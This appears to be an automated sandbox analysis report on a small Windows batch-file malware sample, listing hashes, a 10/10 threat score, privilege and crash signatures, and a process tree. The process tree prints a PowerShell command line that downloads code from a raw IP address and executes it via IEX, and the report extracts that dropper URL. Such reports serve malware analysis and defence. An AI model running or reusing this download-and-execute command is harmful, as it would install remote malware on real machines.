Analysis
-
max time kernel
132s -
max time network
73s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
bd978ef89b238bfae52044568aa42c75.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
bd978ef89b238bfae52044568aa42c75.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
bd978ef89b238bfae52044568aa42c75.bat
-
Size
216B
-
MD5
f0df01a4173ce448321aea96ca779d4e
-
SHA1
ad432c315a539443f75f5c2456748c6e8b5d5c4f
-
SHA256
0152af15e9235a11368c7777e3d71e92c99fadbe9392a54acfab853445a9c50d
-
SHA512
08f9b9f0067ace92197239000cc1bed35239c6cfad5d60e2e388189b38affebd639a6e2c52e120e2cf8ba58c8e00b2035ff9536d00a41d844d8df68556504055
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/bd978ef89b238bfae52044568aa42c75
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exe
pid    pid_target   process        target process
1080   1420         WerFault.exe   powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exe
description                  pid    process
Token: SeRestorePrivilege    1080   WerFault.exe
Token: SeBackupPrivilege     1080   WerFault.exe
Token: SeDebugPrivilege      1080   WerFault.exe
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exe
pid    process
1080   WerFault.exe   (same row repeated 14 times)
Processes
-
C:\Windows\system32\cmd.exe (depth 1, PID: 1152)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bd978ef89b238bfae52044568aa42c75.bat"
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID: 1420)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bd978ef89b238bfae52044568aa42c75');Invoke-UNXZXCRBF;Start-Sleep -s 10000"
    C:\Windows\SysWOW64\WerFault.exe (depth 3, PID: 1080)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 704
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses